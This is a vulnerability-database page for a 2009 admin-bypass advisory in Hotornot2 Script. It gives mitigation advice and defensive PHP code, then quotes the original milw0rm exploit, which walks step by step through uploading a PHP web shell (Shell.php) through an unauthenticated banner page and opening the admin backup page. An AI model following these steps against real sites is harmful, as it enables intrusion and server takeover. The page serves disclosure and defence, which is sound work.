Vendor: Hotornot2 Script
By: sniper code
CVSS: 3.3 (MEDIUM)
Vulnerability type: Admin Bypass
CWE: 287
Product Name: Hotornot2 Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Hotornot2 Script (Remote apload) Admin Bypass Vulnerability

A vulnerability exists in Hotornot2 Script which allows an attacker to bypass the admin authentication and upload a malicious file. The banner upload page at http://localhost/[path]/admin/sitebanners/upload_banners.php is reachable without logging in, so an attacker can upload an arbitrary file (for example a PHP script) through it. The uploaded file is then served from http://localhost/[path]/banners/Shell.php, where it executes as a web shell. The admin backup page at http://localhost/[path]/admin/backup is likewise reachable without authentication.

Mitigation:

Ensure that proper authentication is enforced on every page under the admin directory (including the banner upload and backup pages), not only on the admin front page. Additionally, restrict banner uploads to image files validated by content rather than by filename, store them under a server-chosen name, and configure the web server so that files in the banners directory are never executed as scripts.
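The following is an added example of the mitigation described above, written for this page and not taken from the Hotornot2 Script code base. It shows an authentication guard that each admin page would include before doing any work, and a banner-storage routine that validates the file by content and saves it under a server-chosen name. The session keys (`admin_id`, `is_admin`), the login page path and the banners directory are assumptions; the real script's session layout is not on this page.

```php
<?php
// Added example (not from the Hotornot2 Script code base). Assumed session
// keys: 'admin_id' and 'is_admin', set by an assumed /admin/login.php.
session_start();

// Every page under /admin/ calls this first. The original weakness was that
// upload_banners.php and the backup page could be requested with no login.
function require_admin(): void
{
    if (empty($_SESSION['admin_id']) || empty($_SESSION['is_admin'])) {
        // Unauthenticated or non-admin session: drop it and send to login.
        $_SESSION = [];
        session_destroy();
        header('Location: /admin/login.php', true, 302);
        exit;
    }
}

require_admin();

// Store an uploaded banner only if its *content* is an image, and never under
// the client-supplied filename, so a file named Shell.php can neither be
// accepted nor be served back under that name.
function store_banner(array $file, string $dir): string
{
    $allowed = [
        'image/png'  => 'png',
        'image/jpeg' => 'jpg',
        'image/gif'  => 'gif',
    ];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }

    // Detect the MIME type from the bytes on disk, not from $_FILES['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('banner must be a PNG, JPEG or GIF image');
    }

    // Server-chosen random name with an extension matching the detected type.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store banner');
    }
    return $name;
}

// Usage inside upload_banners.php (after require_admin() above):
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['banner'])) {
    try {
        $stored = store_banner($_FILES['banner'], __DIR__ . '/../../banners');
        echo 'Stored banner as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

The guard and the storage routine are independent layers: even if a future page forgets `require_admin()`, content-based validation plus a server-chosen filename means an uploaded script is not written with a `.php` extension, and a web-server rule that disables script execution in the banners directory (for Apache, a `php_flag engine off` or `RemoveHandler` directive in that directory) closes the remaining path.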
Source

Exploit-DB raw data:

    [+]
     Hotornot2 Script (Remote apload) Admin Bypass Vulnerability

    ===== ++ by sniper code++============================================

    Author : sniper code  ( S.C.T-443 )
    website : www.sec-code.com
    ===================================================================================================================
    [+]
    ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php
    ====================================================================================================================
    [+]
    Exploit:

    GO to :
    http://localhost/[path]/admin/sitebanners/upload_banners.php ( no need to register)

    you will see (Upload banners)

    ( browse and select file like example : Shell.php) and press upload )
    you can press View banners button to see and ensure your file uploaded ...

    then Go to :
    http://localhost/[path]/banners/Shell.php    ( will view the shell )

    [+]
    for bypassing admin backup :
    Go to :
    http://localhost/[path]/admin/backup

    dork : use ur mind ^_^

    That's it . . .
                            
    ===================================================================================================================
    [+] Greetz to :

           [»] MN9 - AL-H7ano0ty - AB0 3thaB -snake1095 - rxh
           [»] JiKo, Crackerz child...
           [=]all members of tryag.cc + sec-code.com

    ===================================================================================================================

# milw0rm.com [2009-05-26]